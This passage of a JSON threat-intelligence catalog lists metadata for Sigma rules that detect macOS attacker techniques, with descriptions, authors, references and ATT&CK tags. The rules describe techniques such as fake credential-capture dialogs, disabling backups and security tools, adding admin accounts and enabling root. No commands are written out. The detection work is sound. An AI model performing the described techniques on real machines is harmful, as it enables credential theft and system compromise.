"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jxa_in_memory_execution.yml" ], "tags": [ "attack.t1059.002", "attack.t1059.007", "attack.execution" ] }, "related": [ { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f1408a58-0e94-4165-b80a-da9f96cf6fc3", "value": "JXA In-memory Execution Via OSAScript" }, { "description": "Detects the use of \"ioreg\" which will show I/O Kit registry information.\nThis process is used for system information discovery.\nIt has been observed in-the-wild by calling this 
process directly or using bash and grep to look for specific strings.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-12-20", "falsepositive": [ "Legitimate administrative activities" ], "filename": "proc_creation_macos_ioreg_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior", "https://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior", "https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d5e7a8b-f484-4a24-945d-7f0efd52eab0", "value": "System Information Discovery Using Ioreg" }, { "description": "Detects the execution traces of the WizardUpdate malware. 
WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", "meta": { "author": "Tim Rauch (rule), Elastic (idea)", "creation_date": "2022-10-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_wizardupdate_malware_infection.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "f68c4a4f-19ef-4817-952c-50dce331f4b0", "value": "Potential WizardUpdate Malware Infection" }, { "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-14", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_network_sniffing.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.t1040" ] 
}, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "adc9bcc4-c39c-4f6b-a711-1884017bf043", "value": "Network Sniffing - MacOs" }, { "description": "Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility \"tmutil\".\nAn attacker can use this to prevent backups from occurring.\n", "meta": { "author": "Pratinav Chandra", "creation_date": "2024-05-29", "falsepositive": [ "Legitimate administrator activity" ], "filename": "proc_creation_macos_tmutil_disable_backup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine", "https://www.loobins.io/binaries/tmutil/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2c95fa8a-8b8d-4787-afce-7117ceb8e3da", "value": "Time Machine Backup Disabled Via Tmutil - MacOS" }, { "description": "Detects execution of the \"jamf\" binary to create user accounts and run commands. 
For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control policies.\n", "meta": { "author": "Jay Pandit", "creation_date": "2023-08-22", "falsepositive": [ "Legitimate use of the JAMF CLI tool by IT support and administrators" ], "filename": "proc_creation_macos_jamf_usage.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html", "https://www.zoocoup.org/casper/jamf_cheatsheet.pdf", "https://github.com/MythicAgents/typhon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_usage.yml" ], "tags": [ "attack.execution" ] }, "uuid": "be2e3a5c-9cc7-4d02-842a-68e9cb26ec49", "value": "JAMF MDM Execution" }, { "description": "Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-08-22", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_dseditgroup_add_to_admin_group.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/dseditgroup.html", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dseditgroup_add_to_admin_group.yml" ], "tags": [ "attack.initial-access", "attack.privilege-escalation", "attack.t1078.003" ] }, "related": [ { "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5d0fdb62-f225-42fb-8402-3dfe64da468a", "value": "User 
Added To Admin Group Via DseditGroup" }, { "description": "Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.", "meta": { "author": "Pratinav Chandra", "creation_date": "2024-05-13", "falsepositive": [ "Legitimate administration activities are expected to trigger false positives. Investigate the command line being passed to determine if the service or launch agent is suspicious." ], "filename": "proc_creation_macos_launchctl_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.loobins.io/binaries/launchctl/", "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/", "https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.001/T1569.001.md", "https://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_launchctl_execution.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1569.001", "attack.t1543.001", "attack.t1543.004" ] }, "related": [ { "dest-uuid": "810aa4ad-61c9-49cb-993f-daa06199421d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d10cbd34-42e3-45c0-84d2-535a09849584", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "573ad264-1371-4ae0-8482-d2673b719dba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae9d710f-dcd1-4f75-a0a5-93a73b5dda0e", "value": "Launch Agent/Daemon Execution Via Launchctl" }, { "description": "Detects the execution of the hdiutil utility in order to create a disk 
image.", "meta": { "author": "Omar Khaled (@beacon_exe)", "creation_date": "2024-08-10", "falsepositive": [ "Legitimate usage of hdiutil by administrators and users." ], "filename": "proc_creation_macos_hdiutil_create.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.loobins.io/binaries/hdiutil/", "https://ss64.com/mac/hdiutil.html", "https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "1cf98dc2-fcb0-47c9-8aea-654c9284d1ae", "value": "Disk Image Creation Via Hdiutil - MacOS" }, { "description": "Detects attempts to create and add an account to the admin group via \"sysadminctl\"", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-03-19", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_sysadminctl_add_user_to_admin_group.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos", "https://ss64.com/osx/sysadminctl.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" ], "tags": [ "attack.initial-access", "attack.privilege-escalation", "attack.t1078.003" ] }, "related": [ { "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "652c098d-dc11-4ba6-8566-c20e89042f2b", "value": "User Added To Admin Group Via Sysadminctl" }, { "description": "Detects attempts to use system dialog prompts to capture user 
credentials", "meta": { "author": "remotephone, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Legitimate administration tools and activities" ], "filename": "proc_creation_macos_gui_input_capture.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" ], "tags": [ "attack.credential-access", "attack.t1056.002" ] }, "related": [ { "dest-uuid": "a2029942-0a85-4947-b23c-ca434698171d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60f1ce20-484e-41bd-85f4-ac4afec2c541", "value": "GUI Input Capture - macOS" }, { "description": "Detects the use of \"sw_vers\" for system information discovery", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-12-20", "falsepositive": [ "Legitimate administrative activities" ], "filename": "proc_creation_macos_swvers_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/sw_vers.html", "https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior", "https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_swvers_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"5de06a6f-673a-4fc0-8d48-bcfe3837b033", "value": "System Information Discovery Using sw_vers" }, { "description": "Detects potential suspicious child processes of \"jamf\". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-22", "falsepositive": [ "Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly" ], "filename": "proc_creation_macos_jamf_susp_child.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html", "https://www.zoocoup.org/casper/jamf_cheatsheet.pdf", "https://github.com/MythicAgents/typhon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_susp_child.yml" ], "tags": [ "attack.execution" ] }, "uuid": "2316929c-01aa-438c-970f-099145ab1ee6", "value": "JAMF MDM Potential Suspicious Child Process" }, { "description": "Detects attempts to create and add an account to the admin group via \"dscl\"", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-03-19", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_dscl_add_user_to_admin_group.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/dscl.html", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dscl_add_user_to_admin_group.yml" ], "tags": [ "attack.initial-access", "attack.privilege-escalation", "attack.t1078.003" ] }, "related": [ { "dest-uuid": 
"fdc47f44-dd32-4b99-af5f-209f556f63c2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b743623c-2776-40e0-87b1-682b975d0ca5", "value": "User Added To Admin Group Via Dscl" }, { "description": "Detects attempts to enable the root account via \"dsenableroot\"", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-08-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_dsenableroot_enable_root_account.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/dsenableroot.html", "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml", "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dsenableroot_enable_root_account.yml" ], "tags": [ "attack.t1078", "attack.t1078.001", "attack.t1078.003", "attack.initial-access", "attack.persistence" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6151cbea-819b-455a-9fa6-99a1cc58797d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "821bcf4d-46c7-4b87-bc57-9509d3ba7c11", "value": "Root Account Enable Via Dsenableroot" }, { "description": "Detects enumeration of local system groups", "meta": { "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "creation_date": "2020-10-11", "falsepositive": [ "Legitimate administration activities" ], "filename": 
"proc_creation_macos_local_groups.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", "value": "Local Groups Discovery - MacOs" }, { "description": "Detects the command line executed when TeamViewer starts a session initiated by a remote host.\nOnce a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.\n", "meta": { "author": "Josh Nickels, Qi Nan", "creation_date": "2024-03-11", "falsepositive": [ "Legitimate usage of TeamViewer" ], "filename": "proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f459ccb4-9805-41ea-b5b2-55e279e2424a", "value": "Remote Access Tool - Team Viewer Session Started On MacOS Host" }, { "description": "Detects when a user manipulates the Firmware Password on MacOS. 
NOTE - this command has been disabled on silicon-based apple computers.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-30", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_susp_macos_firmware_activity.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", "https://www.manpagez.com/man/8/firmwarepasswd/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" ], "tags": [ "attack.impact" ] }, "uuid": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", "value": "Suspicious MacOS Firmware Activity" }, { "description": "Detects the execution of the hdiutil utility in order to mount disk images.", "meta": { "author": "Omar Khaled (@beacon_exe)", "creation_date": "2024-08-10", "falsepositive": [ "Legitimate usage of hdiutil by administrators and users." 
], "filename": "proc_creation_macos_hdiutil_mount.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.loobins.io/binaries/hdiutil/", "https://ss64.com/mac/hdiutil.html", "https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf241472-f014-4f01-a869-96f99330ca8c", "value": "Disk Image Mounting Via Hdiutil - MacOS" }, { "description": "Detects disabling security tools", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_macos_disable_security_tools.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", "value": "Disable Security Tools" }, { "description": "Detects attempts to use screencapture to collect macOS screenshots", "meta": { "author": 
"remotephone, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Legitimate user activity taking screenshots" ], "filename": "proc_creation_macos_screencapture.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0877ed01-da46-4c49-8476-d49cdd80dfa7", "value": "Screen Capture - macOS" }, { "description": "Detect file time attribute change to hide new or changes to existing files", "meta": { "author": "Igor Fits, Mikhail Larin, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_change_file_time_attr.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.006" ] }, "related": [ { "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", "value": "File Time Attribute Change" }, { "description": "Detects enumeration of local network configuration", "meta": { 
"author": "remotephone, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_susp_system_network_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_system_network_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1016" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58800443-f9fc-4d55-ae0c-98a3966dfb97", "value": "System Network Discovery - macOS" }, { "description": "Detects the execution of \"sysctl\" with specific arguments that have been used by threat actors and malware. 
It provides system hardware information.\nThis process is primarily used to detect and avoid virtualization and analysis environments.\n", "meta": { "author": "Pratinav Chandra", "creation_date": "2024-05-27", "falsepositive": [ "Legitimate administrative activities" ], "filename": "proc_creation_macos_sysctl_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.loobins.io/binaries/sysctl/#", "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/", "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", "https://evasions.checkpoint.com/techniques/macos.html", "https://www.virustotal.com/gui/file/b4b1fc65f87b3dcfa35e2dbe8e0a34ad9d8a400bec332025c0a2e200671038aa/behavior", "https://www.virustotal.com/gui/file/1c547a064494a35d6b5e6b459de183ab2720a22725e082bed6f6629211f7abc1/behavior", "https://objective-see.org/blog/blog_0x1E.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_sysctl_discovery.yml" ], "tags": [ "attack.defense-evasion", "attack.t1497.001", "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ff08e55-ea53-4f27-94a1-eff92e6d9d5c", "value": "System Information Discovery Via Sysctl - MacOS" }, { "description": "Detects enumeration of local or remote network services.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-21", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_network_service_scanning.yml", "level": "low", "logsource.category": "process_creation", 
"logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84bae5d4-b518-4ae0-b331-6d4afd34d00f", "value": "MacOS Network Service Scanning" }, { "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to add junk data to a file.", "meta": { "author": "Igor Fits, Mikhail Larin, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate script work" ], "filename": "proc_creation_macos_binary_padding.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", "https://linux.die.net/man/1/dd", "https://linux.die.net/man/1/truncate", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.001" ] }, "related": [ { "dest-uuid": "5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95361ce5-c891-4b0a-87ca-e24607884a96", "value": "Binary Padding - MacOS" }, { "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. 
Detection will focus on crontab jobs uploaded from the tmp folder.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_schedule_task_job_cron.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.privilege-escalation", "attack.t1053.003" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460", "value": "Scheduled Cron Task/Job - MacOs" }, { "description": "Detects use of the command \"split\" to split files into parts for possible transfer.", "meta": { "author": "Igor Fits, Mikhail Larin, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Legitimate administrative activity" ], "filename": "proc_creation_macos_split_file_into_pieces.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml" ], "tags": [ "attack.exfiltration", "attack.t1030" ] }, "related": [ { "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", "value": "Split A File Into Pieces" }, { "description": 
"Detects suspicious child processes spawning from Microsoft Office suite applications such as Word or Excel. This could indicate malicious macro execution.", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-01-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_office_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://redcanary.com/blog/applescript/", "https://objective-see.org/blog/blog_0x4B.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1059.002", "attack.t1137.002", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { 